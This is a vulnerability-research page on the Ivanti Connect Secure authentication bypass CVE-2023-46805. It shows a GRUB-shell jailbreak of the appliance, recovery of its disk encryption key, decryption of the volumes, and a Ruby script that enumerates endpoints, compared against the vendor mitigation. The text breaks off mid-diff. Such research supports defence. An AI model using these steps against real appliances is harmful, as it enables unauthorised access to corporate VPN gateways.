(https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/)
Reported: January 11, 2024 10:40am UTC (1 month ago) • Edited 1 month ago
WOULD YOU LIKE TO DELETE THIS EXPLOITED IN THE WILD REPORT?
Yes, delete this report
inokii indicated sources as
* Government or Industry Alert
(https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* Other: CISA Gov Alert
(https://www.cisa.gov/news-events/alerts/2024/01/10/cisa-adds-two-known-exploited-vulnerabilities-catalog)
Reported: January 17, 2024 5:51am UTC (1 month ago)
WOULD YOU LIKE TO DELETE THIS EXPLOITED IN THE WILD REPORT?
Yes, delete this report
ccondon-r7 indicated source as Threat Feed
(https://twitter.com/felixaime/status/1749454051601776979)
Reported: January 27, 2024 8:08pm UTC (3 weeks ago)
WOULD YOU LIKE TO DELETE THIS EXPLOITED IN THE WILD REPORT?
Yes, delete this report
REFERENCES
CANONICAL
CVE-2023-46805 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46805)
ADVISORY
CSA (https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-002)
CISA
(https://www.cisa.gov/news-events/alerts/2024/01/10/ivanti-releases-security-update-connect-secure-and-policy-secure-gateways)
EXPLOIT
https://github.com/rapid7/metasploit-framework/pull/18708
MISCELLANEOUS
https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
ADDITIONAL INFO
Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Rapid7
January 16, 2024 1:14pm UTC (1 month ago)• Last updated January 16, 2024 3:17pm
UTC (1 month ago)
TECHNICAL ANALYSIS
OVERVIEW
Starting January 10, 2024, multiple parties (Ivanti, Volexity, and Mandiant)
disclosed the existence of a zero-day exploit chain affecting Ivanti Connect
Secure (previously called Pulse Connect Secure) and Ivanti Policy Secure
gateway. This exploit chain was exploited in the wild circa December 2023. The
exploit chain consists of two vulnerabilities, an authentication bypass
(CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The
exploit chain allows a remote unauthenticated attacker to execute arbitrary OS
commands with root privileges. As per the Ivanti advisory, these vulnerabilities
affect all supported versions of the products, versions 9.x and 22.x. It is
unknown if the unsupported versions 8.x and older are also affected.
This analysis will detail our findings against Ivanti Connect Secure version
22.3R1 (build 1647).
JAILBREAKING THE APPLIANCE
The version of Ivanti Connect Secure we tested is distributed as a virtual
appliance that can run on either VMWare or HyperV. After installing the
appliance via HyperV and letting it run for a while we took a snapshot of the VM
and saved the virtual hard disk to a VHD file. We then mounted this VHD in a
separate Ubuntu Linux VM so we could begin to inspect the contents. We quickly
learn that the majority of partitions are LUKS encrypted, and we cannot access
them without a key or a jailbreak, i.e. getting a root shell on the device
somehow.
Prior work by Orange Tsai and Meh Chang in 2019 against Pulse Connect Secure
(Infiltrating Corporate Intranet Like NSA (PDF)) showed how to jailbreak the
appliance by patching an initialization script’s path in-memory, during a
specific point in the boot process. This allowed a root shell to be spawned and
gave full access to the mounted filesystem. Unfortunately this technique no
longer works.
On January 13, 2024, watchTowr Labs published a blog that demonstrated how they
managed to jailbreak the appliance by dropping to a Grub bootloader recovery
shell using a novel technique that bypasses an attempt at blocking the default
recovery shell. Using this technique, we were able to recover the encryption key
for the appliance.
First we boot the appliance and from Grub, we press e to edit the current
configuration. We use the watchTowr technique and append the parameter
init=//bin/sh to bypass the recovery shell filtering (/bin/sh is blocked, but an
alternative path such as //bin/sh will work).
We then press F10 to boot, and are dropped to a shell. We dump the contents of
the 16 byte encryption key via the command cat -Ev /etc/lvmkey. The -v switch
will output the files contents using an obscure notation that uses ^ and M-
sequences to encode non-ASCII characters (A decoding table can be found here).
We do this as we found no other way to exfiltrate the 16 byte key from the
recovery shell. We also use the switch -E to display the $ symbol for the new
line char, as coincidentally the key contains this character.
Using this notation, we learn that the key is
$M-9M-^^M-OM-^IuNM-G`^XM-J^NM-Z]jM-G, and when converted into hex notation this
becomes 0ab99ecf89754ec76018ca0eda5d6ac7.
Knowing the decryption key we can now successfully mount the encrypted volumes
via the following sequence of commands:
# Install required tools...
$ sudo apt install lvm2
$ sudo apt install cryptsetup-bin
# Detect the volumes...
$ sudo vgscan
Found volume group "groupA" using metadata type lvm2
Found volume group "groupZ" using metadata type lvm2
$ sudo vgchange -ay groupA
2 logical volume(s) in volume group "groupA" now active
$ sudo vgchange -ay groupZ
1 logical volume(s) in volume group "groupZ" now active
$ sudo lvs
LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert
home groupA -wi-a----- 3.50g
runtime groupA -wi-a----- 8.80g
home groupZ -wi-a----- 3.00g
# Write the LUKS decryption key to a file...
$ echo -n 0ab99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > key.bin
# Open the 3 volumes...
$ sudo cryptsetup luksOpen -d key.bin /dev/groupA/home ics_disk1
$ sudo cryptsetup luksOpen -d key.bin /dev/groupA/runtime ics_disk2
$ sudo cryptsetup luksOpen -d key.bin /dev/groupZ/home ics_disk3
# Mount the 3 volumes...
$ mkdir ics_disk1 ics_disk2 ics_disk3
$ sudo mount /dev/mapper/ics_disk1 ics_disk1/
$ sudo mount /dev/mapper/ics_disk2 ics_disk2/
$ sudo mount /dev/mapper/ics_disk3 ics_disk3/
# Verify we can access the appliance files…
$ cat ics_disk1/root/home/ssl-vpn-VERSION
export DSREL_MAJOR=22
export DSREL_MINOR=3
export DSREL_MAINT=1
export DSREL_DATAVER=4802
export DSREL_PRODUCT=ssl-vpn
export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
Of the three encrypted volumes, the first volume which we mounted as ics_disk1
contains the application code used throughout the below analysis.
BYPASSING AUTHENTICATION
There is not a lot of information to go on when trying to identify the
vulnerabilities in this exploit chain. We have two pieces of information, an XML
file from the vendor which can apply a “mitigation” to a vulnerable system, and
the description of the auth bypass according to the vendor:
> An authentication bypass vulnerability in the web component of Ivanti Connect
> Secure (9.x, 22.x) and Ivanti Policy Secure allows a remote attacker to access
> restricted resources by bypassing control checks.
The CVE mentions the web component is affected, and that control checks can be
bypassed, so we begin by investigating how the appliance’s web component
operates and in particular, how it enforces access controls.
We identified a custom web server written in C++ and located in the binary
ics_disk1/root/home/bin/web. This server will handle all incoming HTTPS requests
for numerous resources, including Perl based CGI scripts and a Python based REST
API. The REST API is implemented as a separate Python Flask application, and
listens on a locally bound TCP port 8090. The REST API endpoints are implemented
via the code located in
ics_disk1/root/home/venv3/lib/python3.6/site-packages/restservice-0.1-py3.6.egg.
The native code web server will proxy requests to this REST server as needed and
authentication is enforced in the native web server and not the Flask
application.
We begin by pulling all URI endpoints that have been hard coded into both the
native code web server binary and the Python based REST server source code. A
simple Ruby script is then used to request all endpoints and record their HTTP
response code.
require 'httparty'
require 'json'
# pulled from restservice-0.1-py3.6/restservice/api/__init__.py and /root/home/bin/web
endpoints = [
"/_/api/aaa",
"/api/",
"/api/my-session",
"/api/private/v1/classic-admin-ui",
"/api/private/v1/cluster/password",
"/api/private/v1/controller-changeset",
"/api/private/v1/license/watermarks/<path:url_suffix>",
"/api/private/v1/totp/server-status",
"/api/private/v1/totp/user-backup-code",
"/api/private/v1/totp/user-login",
"/api/v1/",
"/api/v1/auth",
"/api/v1/cav",
"/api/v1/cav/",
"/api/v1/cav/client/",
"/api/v1/cav/client/auth_token",
"/api/v1/cluster",
"/api/v1/cluster/",
"/api/v1/cluster/<path:section>",
"/api/v1/configuration",
"/api/v1/configuration/",
"/api/v1/configuration/<path:configuration_path>",
"/api/v1/configuration/auth/ace-server/log-table",
"/api/v1/dsintegration",
"/api/v1/enduser",
"/api/v1/enduser/autolaunch-client-apps",
"/api/v1/enduser/bkm-panel-pref",
"/api/v1/enduser/cached-passwords",
"/api/v1/enduser/client/applaunchtoken",
"/api/v1/enduser/client/applaunchtoken/status",
"/api/v1/enduser/client/installer",
"/api/v1/enduser/custom-html5-bookmark",
"/api/v1/enduser/custom-html5-bookmark/input-text",
"/api/v1/enduser/custom-ts-bookmark",
"/api/v1/enduser/custom-ts-bookmark/input-text",
"/api/v1/enduser/custom-unix-file-bookmark",
"/api/v1/enduser/custom-web-bookmark",
"/api/v1/enduser/custom-web-bookmark/input-text",
"/api/v1/enduser/custom-windows-file-bookmark",
"/api/v1/enduser/delete-user-admin",
"/api/v1/enduser/display-mode",
"/api/v1/enduser/display-unix-dir",
"/api/v1/enduser/display-windows-dir",
"/api/v1/enduser/fb/unix-file-download",
"/api/v1/enduser/fb/unix-zip-download",
"/api/v1/enduser/fb/win-file-download",
"/api/v1/enduser/fb/win-zip-download",
"/api/v1/enduser/full",
"/api/v1/enduser/heartbeat",
"/api/v1/enduser/host-resolve-status",
"/api/v1/enduser/html5-remote-desktop-launcher",
"/api/v1/enduser/jsam/apps-reorder",
"/api/v1/enduser/jsam/custom-client-apps",
"/api/v1/enduser/jsam/list-client-apps",
"/api/v1/enduser/jsam/restore-system-settings",
"/api/v1/enduser/landing-page",
"/api/v1/enduser/landing-page/browse",
"/api/v1/enduser/logo-img",
"/api/v1/enduser/onboarding/profile-secure",
"/api/v1/enduser/panel_order",
"/api/v1/enduser/password",
"/api/v1/enduser/rdp-launcher",
"/api/v1/enduser/server-cookies",
"/api/v1/enduser/totp-backup-codes",
"/api/v1/enterprise-onboard/csr-template-status",
"/api/v1/enterprise-onboard/scep-configuration",
"/api/v1/esapdata",
"/api/v1/fb/create-folder",
"/api/v1/fb/create-folder-unix",
"/api/v1/fb/list",
"/api/v1/fb/list-unix",
"/api/v1/fb/set-credentials",
"/api/v1/fb/unix/upload",
"/api/v1/fb/windows/upload",
"/api/v1/gateways",
"/api/v1/host-checker/live-update/validate-credentials",
"/api/v1/integration/",
"/api/v1/license/auth-code",
"/api/v1/license/enforcement",
"/api/v1/license/enforcement/",
"/api/v1/license/ice",
"/api/v1/license/ice/",
"/api/v1/license/keys-status",
"/api/v1/license/keys-status/<path:node_name>",
"/api/v1/license/leased-license-info",
"/api/v1/license/leased-license-info/",
"/api/v1/license/license-agreement-text",
"/api/v1/license/license-capacity",
"/api/v1/license/license-capacity/",
"/api/v1/license/license-client-lease-state",
"/api/v1/license/license-clients",
"/api/v1/license/license-key",
"/api/v1/license/license-server-last-contact-time",
"/api/v1/license/license-server-lease-information",
"/api/v1/license/max-licensed-concurrent-users",
"/api/v1/license/named-users",
"/api/v1/license/named-users/pcs",
"/api/v1/license/named-users/pps",
"/api/v1/license/nsalicense/delete-named-user",
"/api/v1/license/pcls/last-contact-time",
"/api/v1/license/report",
"/api/v1/license/report/",
"/api/v1/license/report/<path:url_suffix>",
"/api/v1/logs",
"/api/v1/logs/<path:section>",
"/api/v1/metrics",
"/api/v1/network",
"/api/v1/network/<path:section>",
"/api/v1/nsa/register",
"/api/v1/nsa/registration-status",
"/api/v1/oidc",
"/api/v1/pps/action/",
"/api/v1/profiler/",
"/api/v1/profiler/auth",
"/api/v1/profiler/exchange",
"/api/v1/profiler/filter",
"/api/v1/profiler/ws",
"/api/v1/pulse-client",
"/api/v1/pulse-client/component-settings/<path:url_suffix>",
"/api/v1/pulse-one",
"/api/v1/pulse-one/<path:section>",
"/api/v1/realm_auth",
"/api/v1/saml-",
"/api/v1/saml-config/<path:auth_server_name>/download-metadata",
"/api/v1/saml-config/<path:metadata_provider_name>",
"/api/v1/saml-config/idp",
"/api/v1/saml-config/idp/download-signin-metadata",
"/api/v1/saml-config/sp",
"/api/v1/sdpotp",
"/api/v1/snmp/download-mib",
"/api/v1/snmpv3",
"/api/v1/snmpv3/<path:section>",
"/api/v1/stats",
"/api/v1/stats/",
"/api/v1/stats/<path:url_suffix>",
"/api/v1/system/active-users",
"/api/v1/system/active-users/session/<path:url_suffix>",
"/api/v1/system/ai-configs/<path:section>",
"/api/v1/system/auth-server/mdm",
"/api/v1/system/auth-server/totp",
"/api/v1/system/auth/aaa-ports-list",
"/api/v1/system/auth/auth-server/<path:auth_server>/api-key",
"/api/v1/system/auth/auth-server/<path:auth_server>/groups",
"/api/v1/system/auth/auth-server/<path:auth_server_name>",
"/api/v1/system/auth/auth-server/<path:auth_server_name>/troubleshoot",
"/api/v1/system/auth/auth-server/<path:auth_server_name>/users",
"/api/v1/system/auth/auth-server/api-key-without-saving",
"/api/v1/system/auth/auth-server/ldap-test-connection",
"/api/v1/system/auth/auth-server/simulate-variables",
"/api/v1/system/binary-configuration",
"/api/v1/system/certificates/client-auth-certificate",
"/api/v1/system/certificates/client-auth-certificate-csrs",
"/api/v1/system/certificates/client-auth-certificate-csrs/",
"/api/v1/system/certificates/client-auth-certificate-csrs/<path:url_suffix>",
"/api/v1/system/certificates/client-ca",
"/api/v1/system/certificates/code-signing-certificates",
"/api/v1/system/certificates/crl",
"/api/v1/system/certificates/device-certificate",
"/api/v1/system/certificates/device-certificate-csrs",
"/api/v1/system/certificates/device-certificate-csrs/",
"/api/v1/system/certificates/device-certificate-csrs/<path:url_suffix>",
"/api/v1/system/certificates/device-certificates",
"/api/v1/system/certificates/device-certificates/<path:url_suffix>",
"/api/v1/system/certificates/expiring-certificates",
"/api/v1/system/certificates/global-onboarding-certificate",
"/api/v1/system/certificates/intermediate-ca",
"/api/v1/system/certificates/server-ca",
"/api/v1/system/certificates/smime-certificate",
"/api/v1/system/date-time",
"/api/v1/system/delete-records",
"/api/v1/system/failed-login-count",
"/api/v1/system/healthcheck",
"/api/v1/system/ifmap/imported-sessions",
"/api/v1/system/ifmap/imported-sessions/<path:url_suffix>",
"/api/v1/system/maintenance",
"/api/v1/system/maintenance/archiving/cloud-server-test-connection",
"/api/v1/system/maintenance/archiving/localbackup",
"/api/v1/system/maintenance/export-universal-xml",
"/api/v1/system/maintenance/export-xml",
"/api/v1/system/maintenance/import-xml",
"/api/v1/system/maintenance/options",
"/api/v1/system/maintenance/password-protection",
"/api/v1/system/maintenance/upgrade",
"/api/v1/system/platform",
"/api/v1/system/resource-profiles/web-profile/<path:applet_name>",
"/api/v1/system/saml/metadata-server-configuration",
"/api/v1/system/status/<path:section>",
"/api/v1/system/status/active-sync-devices",
"/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>",
"/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>/allow-access",
"/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>/block-access",
"/api/v1/system/status/ntp",
"/api/v1/system/status/overview",
"/api/v1/system/system-information",
"/api/v1/system/user-record-synchronization",
"/api/v1/system/user-record-synchronization/database/delete",
"/api/v1/system/user-record-synchronization/database/export",
"/api/v1/system/user-record-synchronization/database/import",
"/api/v1/system/user-record-synchronization/database/retrieve-stats",
"/api/v1/system/user-roles/<role_name>",
"/api/v1/system/user-roles/vlansourceip",
"/api/v1/system/user-stats",
"/api/v1/tasks",
"/api/v1/tenant/status",
"/api/v1/totp/<totpSrv>/users",
"/api/v1/totp/<totpSrv>/users/",
"/api/v1/totp/<totpSrv>/users/<user>",
"/api/v1/totp/<totpSrv>/users/<user>/",
"/api/v1/totp/user-backup-code",
"/api/v1/ueba/",
"/api/v1/users/resource-profile/<path:profile_name>",
"/api/v1/users/resource-profile/virtual-desktops-list",
"/dana",
"/dana-",
"/dana-admin/",
"/dana-admin/download/",
"/dana-admin/mail/",
"/dana-admin/snmp/",
"/dana-cached/",
"/dana-cached/cbox/",
"/dana-cached/cc/",
"/dana-cached/css/",
"/dana-cached/ep/",
"/dana-cached/fb/",
"/dana-cached/fb/nfs/nfv.cgi",
"/dana-cached/fb/smb/wfv.cgi",
"/dana-cached/hc/",
"/dana-cached/imgs/",
"/dana-cached/js/shimdata.cgi",
"/dana-cached/psal/",
"/dana-cached/remediation/",
"/dana-cached/sc/",
"/dana-cached/sc/PulseInstallerServiceVersion.txt",
"/dana-cached/setup/",
"/dana-cached/term/",
"/dana-cached/themes/",
"/dana-cached/webapplets",
"/dana-cached/ws/",
"/dana-html5acc",
"/dana-html5bssl",
"/dana-na",
"/dana-na/",
"/dana-na/auth",
"/dana-na/auth/",
"/dana-na/auth/AAAAAAAA/welcome.cgi",
"/dana-na/auth/AAAAAAAA/welcome.cgi?p=no-access",
"/dana-na/auth/AAAAAAAA/welcome.cgi?p=ssl-weak",
"/dana-na/auth/AAAAAAAA/welcome.cgi?p=timed-out",
"/dana-na/auth/AAAAAAAAAAAAAAAA/welcome.cgi",
"/dana-na/auth/logout.cgi",
"/dana-na/auth/recover.cgi",
"/dana-na/auth/restAuth.cgi",
"/dana-na/auth/saml-sso.cgi",
"/dana-na/auth/welcome.",
"/dana-na/auth/welcome.cgi?p=denied-checkhostname",
"/dana-na/auth/welcome.cgi?p=forced-off",
"/dana-na/auth/welcome.cgi?p=ssl-renego",
"/dana-na/auth/welcome.cgi?p=timed-out",
"/dana-na/auth/welcome.cgi?p=user-unknown",
"/dana-na/css/",
"/dana-na/healthcheck/healthcheck.cgi",
"/dana-na/html/blank.html",
"/dana-na/imgs/",
"/dana-na/meeting/",
"/dana-na/meeting/AAAAAAAAAAAAAAAA/login_meeting.cgi",
"/dana-na/meeting/login_meeting.cgi",
"/dana-na/nc/nc_gina_ver.txt",
"/dana-na/neoteriswatchdogprocess/ping",
"/dana-na/setup/psalinstall.cgi",
"/dana-na/ws/",
"/dana-ws/metric/",
"/dana-ws/namedusers/",
"/dana-ws/namedusers/PCS",
"/dana-ws/namedusers/PPS",
"/dana-ws/saml.ws",
"/dana-ws/saml20.ws",
"/dana-ws/samlecp.ws",
"/dana-ws/soap/",
"/dana-ws/soap/dsifmap",
"/dana/",
"/dana/asm/asmrun.cgi?ppc_wsam_not_installed",
"/dana/cs/cs.cgi",
"/dana/cs/cs_add.cgi",
"/dana/cs/csdbg.cgi",
"/dana/cs/jsammessages",
"/dana/download",
"/dana/download/",
"/dana/error/AccessBlocked.msg",
"/dana/error/BadCgiOutput.msg",
"/dana/error/BadContent.msg",
"/dana/error/CannotConnect.msg",
"/dana/error/CannotReadFromOrigServer.msg",
"/dana/error/CgiDied.msg",
"/dana/error/CgiFailed.msg",
"/dana/error/CgiNotExecutable.msg",
"/dana/error/ExcessiveRequestSize.msg",
"/dana/error/FormPostAutoRedirect.msg",
"/dana/error/FormPostBlocked.msg",
"/dana/error/InternalError.msg",
"/dana/error/InvalidContentLength.msg",
"/dana/error/InvalidHostHeader.msg",
"/dana/error/InvalidOnBoardingURL.msg",
"/dana/error/InvalidPath.msg",
"/dana/error/InvalidPathDisallowedChars.msg",
"/dana/error/InvalidSSLSiteConfirm.msg",
"/dana/error/InvalidSSLSiteDisabled.msg",
"/dana/error/MethodDisallowed.msg",
"/dana/error/NTLMFail.msg",
"/dana/error/NewSSLConnFail.msg",
"/dana/error/OutOfDescriptors.msg",
"/dana/error/PageNotFound.msg",
"/dana/error/PlatformNotSupported.msg",
"/dana/error/ResolveHostnameFail.msg",
"/dana/error/RewritingBlocked.msg",
"/dana/error/TooManyOnboardRequest.msg",
"/dana/error/UserLoginYellowBarMessage.msg",
"/dana/error/WebProxyProcessFail.msg",
"/dana/error/WebSSOFailed.msg",
"/dana/error/finishReadingPostBody.msg",
"/dana/fb/",
"/dana/fb/nfs/addnsh.cgi",
"/dana/fb/nfs/nfb.cgi",
"/dana/fb/nfs/nfmd.cgi",
"/dana/fb/nfs/nnf.cgi",
"/dana/fb/nfs/nu.cgi",
"/dana/fb/nfs/snsrv.cgi",
"/dana/fb/smb",
"/dana/fb/smb/addwsh.cgi",
"/dana/fb/smb/rd.cgi",
"/dana/fb/smb/swg.cgi",
"/dana/fb/smb/wfb.cgi",
"/dana/fb/smb/wfmd.cgi",
"/dana/fb/smb/wnf.cgi",
"/dana/fb/smb/wu.cgi",
"/dana/home",
"/dana/home/activexparams.cgi",
"/dana/home/applaunchtoken.cgi",
"/dana/home/editbk.cgi",
"/dana/home/getProfileSecure.cgi",
"/dana/home/homepage.cgi",
"/dana/home/index.cgi",
"/dana/home/index_data.cgi",
"/dana/home/infranet.cgi",
"/dana/home/infranet_data.cgi",
"/dana/home/installfailed.cgi",
"/dana/home/launch.cgi",
"/dana/home/launch.cgi?",
"/dana/home/netehpl.cgi",
"/dana/home/netestarter.cgi?url=",
"/dana/home/norefr.cgi",
"/dana/home/onboarding.cgi",
"/dana/home/onboarding_device.cgi",
"/dana/home/panelpref.cgi",
"/dana/home/psalwait.cgi",
"/dana/home/starter.cgi",
"/dana/home/starter.cgi?startpageonly=1",
"/dana/home/starter0",
"/dana/html5acc/guacamole/",
"/dana/j",
"/dana/jr?",
"/dana/js",
"/dana/js?",
"/dana/jw?",
"/dana/jz?",
"/dana/pref/advpref.cgi",
"/dana/pref/applications.cgi",
"/dana/pref/pref.cgi",
"/dana/pref/useradm.cgi",
"/dana/pref/userhome.cgi",
"/dana/psalbrowser-extension/",
"/dana/term",
"/dana/term/addhtml5acc.cgi",
"/dana/term/winaddterm.cgi",
"/dana/term/winlaunchterm.cgi",
"/dana/uploadlog/uploadlog.cgi",
"/dana/user/",
]
target = 'https://192.168.86.111'
HTTParty::Basement.default_options.update(verify: false)
endpoints.each do |endpoint|
endpoint.gsub!(/(<\S+>)/, 'A' * 32 )
begin
response = HTTParty.get("#{target}#{endpoint}",follow_redirects: false)
p "GET, #{response.code}, #{endpoint}"
rescue
p "GET, timeout, #{endpoint}"
end
begin
response = HTTParty.post("#{target}#{endpoint}",follow_redirects: false)
p "POST, #{response.code}, #{endpoint}"
rescue
p "POST, timeout, #{endpoint}"
end
begin
response = HTTParty.put("#{target}#{endpoint}",follow_redirects: false)
p "PUT, #{response.code}, #{endpoint}"
rescue
p "PUT, timeout, #{endpoint}"
end
begin
response = HTTParty.delete("#{target}#{endpoint}",follow_redirects: false)
p "DELETE, #{response.code}, #{endpoint}"
rescue
p "DELETE, timeout, #{endpoint}"
end
end
We run this script twice, first against an instance of Ivanti Connect Secure
that does not have the mitigation file applied, and a second time against an
instance of Ivanti Connect Secure that does have the mitigation file applied.
Comparing the results of these two files shows the following:
diff --git a/all_endpoints_no_mitigation.txt b/all_endpoints_yes_mitigation.txt
index 0411078..c7c8111 100644
--- a/all_endpoints_no_mitigation.txt
+++ b/all_endpoints_yes_mitigation.txt
@@ -22,10 +22,10 @@
"POST, 403, /api/private/v1/controller-changeset"
"PUT, 403, /api/private/v1/controller-changeset"
"DELETE, 403, /api/private/v1/controller-changeset"
-"GET, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"POST, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"PUT, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"DELETE, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"GET, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"POST, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"PUT, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"DELETE, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"GET, 403, /api/private/v1/totp/server-status"
"POST, 403, /api/private/v1/totp/server-status"
"PUT, 403, /api/private/v1/totp/server-status"
@@ -38,30 +38,30 @@
"POST, 403, /api/private/v1/totp/user-login"
"PUT, 403, /api/private/v1/totp/user-login"
"DELETE, 403, /api/private/v1/totp/user-login"
-"GET, 302, /api/v1/"
-"POST, 302, /api/v1/"
-"PUT, 302, /api/v1/"
-"DELETE, 302, /api/v1/"
+"GET, 403, /api/v1/"
+"POST, 403, /api/v1/"
+"PUT, 403, /api/v1/"
+"DELETE, 403, /api/v1/"
"GET, 403, /api/v1/auth"
"POST, 403, /api/v1/auth"
"PUT, 403, /api/v1/auth"
"DELETE, 403, /api/v1/auth"
-"GET, 302, /api/v1/cav"
-"POST, 302, /api/v1/cav"
-"PUT, 302, /api/v1/cav"
-"DELETE, 302, /api/v1/cav"
-"GET, 302, /api/v1/cav/"
-"POST, 302, /api/v1/cav/"
-"PUT, 302, /api/v1/cav/"
-"DELETE, 302, /api/v1/cav/"
-"GET, 404, /api/v1/cav/client/"
-"POST, 404, /api/v1/cav/client/"
-"PUT, 404, /api/v1/cav/client/"
-"DELETE, 404, /api/v1/cav/client/"
-"GET, 302, /api/v1/cav/client/auth_token"
-"POST, 302, /api/v1/cav/client/auth_token"
-"PUT, 302, /api/v1/cav/client/auth_token"
-"DELETE, 302, /api/v1/cav/client/auth_token"
+"GET, 403, /api/v1/cav"
+"POST, 403, /api/v1/cav"
+"PUT, 403, /api/v1/cav"
+"DELETE, 403, /api/v1/cav"
+"GET, 403, /api/v1/cav/"
+"POST, 403, /api/v1/cav/"
+"PUT, 403, /api/v1/cav/"
+"DELETE, 403, /api/v1/cav/"
+"GET, 403, /api/v1/cav/client/"
+"POST, 403, /api/v1/cav/client/"
+"PUT, 403, /api/v1/cav/client/"
+"DELETE, 403, /api/v1/cav/client/"
+"GET, 403, /api/v1/cav/client/auth_token"
+"POST, 403, /api/v1/cav/client/auth_token"
+"PUT, 403, /api/v1/cav/client/auth_token"
+"DELETE, 403, /api/v1/cav/client/auth_token"
"GET, 403, /api/v1/cluster"
"POST, 403, /api/v1/cluster"
"PUT, 403, /api/v1/cluster"
@@ -94,10 +94,10 @@
"POST, 403, /api/v1/dsintegration"
"PUT, 403, /api/v1/dsintegration"
"DELETE, 403, /api/v1/dsintegration"
-"GET, 302, /api/v1/enduser"
-"POST, 302, /api/v1/enduser"
-"PUT, 302, /api/v1/enduser"
-"DELETE, 302, /api/v1/enduser"
+"GET, 403, /api/v1/enduser"
+"POST, 403, /api/v1/enduser"
+"PUT, 403, /api/v1/enduser"
+"DELETE, 403, /api/v1/enduser"
"GET, 302, /api/v1/enduser/autolaunch-client-apps"
"POST, 302, /api/v1/enduser/autolaunch-client-apps"
"PUT, 302, /api/v1/enduser/autolaunch-client-apps"
@@ -186,22 +186,22 @@
"POST, 302, /api/v1/enduser/fb/win-zip-download"
"PUT, 302, /api/v1/enduser/fb/win-zip-download"
"DELETE, 302, /api/v1/enduser/fb/win-zip-download"
-"GET, 302, /api/v1/enduser/full"
-"POST, 302, /api/v1/enduser/full"
-"PUT, 302, /api/v1/enduser/full"
-"DELETE, 302, /api/v1/enduser/full"
+"GET, 403, /api/v1/enduser/full"
+"POST, 403, /api/v1/enduser/full"
+"PUT, 403, /api/v1/enduser/full"
+"DELETE, 403, /api/v1/enduser/full"
"GET, 302, /api/v1/enduser/heartbeat"
"POST, 302, /api/v1/enduser/heartbeat"
"PUT, 302, /api/v1/enduser/heartbeat"
"DELETE, 302, /api/v1/enduser/heartbeat"
-"GET, 302, /api/v1/enduser/host-resolve-status"
-"POST, 302, /api/v1/enduser/host-resolve-status"
-"PUT, 302, /api/v1/enduser/host-resolve-status"
-"DELETE, 302, /api/v1/enduser/host-resolve-status"
-"GET, 302, /api/v1/enduser/html5-remote-desktop-launcher"
-"POST, 302, /api/v1/enduser/html5-remote-desktop-launcher"
-"PUT, 302, /api/v1/enduser/html5-remote-desktop-launcher"
-"DELETE, 302, /api/v1/enduser/html5-remote-desktop-launcher"
+"GET, 403, /api/v1/enduser/host-resolve-status"
+"POST, 403, /api/v1/enduser/host-resolve-status"
+"PUT, 403, /api/v1/enduser/host-resolve-status"
+"DELETE, 403, /api/v1/enduser/host-resolve-status"
+"GET, 403, /api/v1/enduser/html5-remote-desktop-launcher"
+"POST, 403, /api/v1/enduser/html5-remote-desktop-launcher"
+"PUT, 403, /api/v1/enduser/html5-remote-desktop-launcher"
+"DELETE, 403, /api/v1/enduser/html5-remote-desktop-launcher"
"GET, 302, /api/v1/enduser/jsam/apps-reorder"
"POST, 302, /api/v1/enduser/jsam/apps-reorder"
"PUT, 302, /api/v1/enduser/jsam/apps-reorder"
@@ -418,10 +418,10 @@
"POST, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"PUT, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"DELETE, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"GET, 302, /api/v1/metrics"
-"POST, 302, /api/v1/metrics"
-"PUT, 302, /api/v1/metrics"
-"DELETE, 302, /api/v1/metrics"
+"GET, 403, /api/v1/metrics"
+"POST, 403, /api/v1/metrics"
+"PUT, 403, /api/v1/metrics"
+"DELETE, 403, /api/v1/metrics"
"GET, 403, /api/v1/network"
"POST, 403, /api/v1/network"
"PUT, 403, /api/v1/network"
@@ -486,10 +486,10 @@
"POST, 403, /api/v1/realm_auth"
"PUT, 403, /api/v1/realm_auth"
"DELETE, 403, /api/v1/realm_auth"
-"GET, 302, /api/v1/saml-"
-"POST, 302, /api/v1/saml-"
-"PUT, 302, /api/v1/saml-"
-"DELETE, 302, /api/v1/saml-"
+"GET, 403, /api/v1/saml-"
+"POST, 403, /api/v1/saml-"
+"PUT, 403, /api/v1/saml-"
+"DELETE, 403, /api/v1/saml-"
"GET, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata"
"POST, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata"
